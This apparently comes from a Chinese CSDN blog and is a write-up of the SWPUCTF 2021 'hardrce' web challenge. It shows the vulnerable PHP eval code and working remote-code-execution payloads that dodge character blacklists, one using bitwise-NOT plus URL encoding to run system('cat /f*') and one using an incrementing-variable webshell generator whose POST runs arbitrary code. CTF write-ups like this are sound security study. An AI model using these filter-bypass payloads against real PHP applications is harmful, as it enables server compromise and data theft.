【SWPUCTF 2021 新生赛】hardrce

于 2025-03-30 20:33:23 发布
阅读量301 收藏 1
点赞数 6
CC 4.0 BY-SA版权
文章标签: 网络安全 NSSCTF SWPUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/LDdfq/article/details/146774128

题目

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("LTLT说不能用这些奇奇怪怪的符号哦!");
    }}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
    die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>

思路

利用了按位取反编码URL编码的组合

EXP

1. 目标指令

system("cat /f*");

2. 加密步骤

步骤1:拆分指令

将指令拆分为两部分:

  1. system

  2. cat /f*

步骤2:按位取反

对每个字符的ASCII值进行按位取反操作(~byte,等价于 0xFF - byte)。

  • 第一部分:system

    复制

's' → 0x73 → ~0x73 = 0x8C
'y' → 0x79 → ~0x79 = 0x86
's' → 0x73 → ~0x73 = 0x8C
't' → 0x74 → ~0x74 = 0x8B
'e' → 0x65 → ~0x65 = 0x9A
'm' → 0x6D → ~0x6D = 0x92
组合结果:0x8C, 0x86, 0x8C, 0x8B, 0x9A, 0x92

  • 第二部分:cat /f*

    复制

'c' → 0x63 → ~0x63 = 0x9C
'a' → 0x61 → ~0x61 = 0x9E
't' → 0x74 → ~0x74 = 0x8B
' ' → 0x20 → ~0x20 = 0xDF
'/' → 0x2F → ~0x2F = 0xD0
'f' → 0x66 → ~0x66 = 0x99
'*' → 0x2A → ~0x2A = 0xD5
组合结果:0x9C, 0x9E, 0x8B, 0xDF, 0xD0, 0x99, 0xD5
步骤3:URL编码

将取反后的字节序列转换为URL编码:

  • 第一部分0x8C, 0x86, 0x8C, 0x8B, 0x9A, 0x92%8C%86%8C%8B%9A%92

  • 第二部分0x9C, 0x9E, 0x8B, 0xDF, 0xD0, 0x99, 0xD5%9C%9E%8B%DF%D0%99%D5

步骤4:payload

将编码后的两部分用括号包裹,并用分号分隔:

wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);

扩展

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\^','\~','\|'];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("小伙子只会异或和取反?不好意思哦LTLT说不能用!!");
    }}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{
    die("Ra'sAlGhul说用字母数字是没有灵魂的!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>

异反被屏蔽。这种要进行自增马进行绕过

EXP

<?php
$hack = "";
function addchar($char, $o) {
  global $hack;
  $hack.="\$__=\$_;";
  for ($i = ord('A'); $i < ord($char); ++$i) {
    $hack.="\$__++;";
  }
  $hack.=$o.".=\$__;";
}

$s1 = "ASSERT"; //3_
$s2 = "POST"; // 4_

$hack.="\$_=[];\$_=@\"\$_\";\$_=\$_['!'=='@'];";

$hack.="\$___='';";
for ($i = 0; $i < strlen($s1); ++$i) {
  addchar($s1[$i], "\$___");
}
$hack.="\$____='_';";
for ($i = 0; $i < strlen($s2); ++$i) {
  addchar($s2[$i], "\$____");
}
$hack.="\$_=[];";
$hack.="\$___(\$\$____[_]);";
// print($hack);
print(urlencode($hack));

payload

GET请求:
http://node7.anna.nssctf.cn:28713/?wllm=%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B%27!%27%3D%3D%27%40%27%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D%27_%27%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B

POST请求:
_=eval($_POST['xxx'])&xxx

XiaoHei_Q
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值